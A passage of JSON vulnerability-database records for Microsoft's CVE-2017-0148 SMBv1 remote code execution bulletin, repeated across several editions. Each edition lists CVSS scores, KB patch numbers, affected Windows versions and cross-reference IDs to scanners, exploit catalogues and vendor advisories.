"AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KBMS16-110, 3187754", "KB3212646", "KB3210720", "KB4013198", "KB4012216", "KB3205401", "KB4012598", "KB3210721", "KB4013429", "KB4012217", "KB4012606", "KB4012212", "KB4012213", "KB3205409", "KB3213986", "KB3177186", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T20:47:14", "differentElements": ["msAffectedSoftware"], "edition": 35}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-11T22:53:48", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013429", "KB4012212", "KB3210720", "KB4012606", "KB4012217", "KB3212646", "KB4012216", "KB4012214", "KBMS16-110, 3187754", "KB3213986", "KB4012598", "KB3205401", "KB3177186", "KB3210721", "KB4012213", "KB4012215", "KB3205409", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T22:53:48", "differentElements": ["msAffectedSoftware"], "edition": 36}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "3c8f710d7629e55dea40adfa20c8440d", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T04:44:31", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-11T22:53:48", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-11T22:53:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012598", "KB4013198", "KB3177186", "KB4013429", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012214", "KB4012212", "KB3213986", "KB3205401", "KB4012213", "KB3212646", "KB3210720", "KB4012215", "KB4012217", "KB3205409", "KB4012216"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 